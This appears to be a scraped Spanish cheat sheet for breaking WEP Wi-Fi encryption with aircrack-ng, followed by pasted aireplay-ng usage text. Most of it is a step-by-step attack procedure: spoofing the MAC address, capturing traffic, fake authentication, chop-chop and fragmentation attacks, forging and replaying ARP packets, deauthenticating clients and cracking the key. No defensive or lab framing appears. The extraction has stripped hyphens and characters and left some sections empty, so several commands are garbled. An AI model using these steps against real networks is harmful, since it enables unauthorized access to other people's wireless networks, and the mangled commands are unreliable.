Sei sulla pagina 1di 5


ABRIR EN VENTANA 1: Ver Redes: >>iwconfig => ver tarjetas instaladas >>ifconfig=> ver tarjetas activas. Activar /Desactivar, tarjetas: >>ifconfig [interfaz] up/down Activar /Desactivar Modo monitor: >>airmon-ng start [interfaz] >>airmon-ng stop [interfaz] Activar /Desactivar, tarjetas: >>ifconfig [interfaz] up/down Cambiar MAC: >>macchanger m MACNUEVA [interfaz] Activar /Desactivar, tarjetas: >>ifconfig [interfaz] up/down MONITOREO: airodump-ng [interfaz] airodump-ng -encripter TIPODECIFRADO [interfaz] DETENER CON CTRL+C Monitoreo especfico: >>airodumpng c CANAL -bssid BSSID w NOMBRECAPTURA [interfaz]

ABRIR EN VENTANA 2: Asociacin Falsa:


ABRIR EN VENTANA 3: Ataque Chop Chop >>aireplayng -4 h MACNUESTRA b BSSID [interfaz] y = yes n = no ~NOTA: ataque de fragmentacin: -5

Saber IP de red: >>tcpdump s 0 n e r ARCHIVO.CAP Fabricar paquete ARP: >>packetforgeng -0 a BSSID h MACNUESTRA k IP_DEL_AP l (ele minuscula) IP_DEL_RANGO y ARCHIVO.XOR w NOMBRE_PAQUETE_QUE_QUERAMOS NOTA: -k : => x defecto -l: =>x defecto

Inyectar Paquete ARP FABRICADO >>aireplayng -2 x 1024 h MACNUESTRA r ARCHIVO_ARP [interfaz] (x toma sus valores de entre 0 y 1024)

ABRIR EN VENTANA 4: Conseguir Clave >>aircrack_ng NOMBRECAPTURA_01.cap Si hay clientes conectados =>No aplicamos chop-chop

*Re-inyeccion de paquetes ARP


Filter options:

-b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit

-f fromds : frame control, From DS bit -w iswep : frame control, WEP -D : disable AP detection bit

Replay options:

-x nbpps : number of packets per second -p fctrl : set frame control word (hex) -a bssid : set Access Point MAC address

-c dmac : set Destination MAC address -h smac : set Source MAC address

-g value : change ring buffer size (default: 8) -F : choose first matching packet

Fakeauth attack options:

-e essid : set target AP SSID -o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives -y prga : keystream for shared key auth -T n : exit after retry fake auth request n time

Arp Replay attack options:


: inject FromDS packets

Fragmentation attack options:

-k IP -l IP

: set destination IP in fragments : set source IP in fragments

Test attack options:


: activates the bitrate test

Source options:

-i iface : capture packets from this interface -r file : extract packets from this pcap file

Miscellaneous options:


: disable /dev/rtc usage

Attack modes (numbers can still be used):


count : deauthenticate 1 or all stations (-0)

--fakeauth delay : fake authentication with AP (-1) --interactive --arpreplay --chopchop --fragment --caffe-latte --cfrag --test : interactive frame selection (-2) : standard ARP-request replay (-3) : decrypt/chopchop WEP packet (-4) : generates valid keystream (-5) : query a client for new IVs (-6) : fragments against a client (-7) : tests injection and quality (-9)

--help : Displays this usage screen>>aireplay ng -3 b BSSID h MACNUESTRA -h MAC_DEL_CLIENTE_ASOCIADO [interfaz]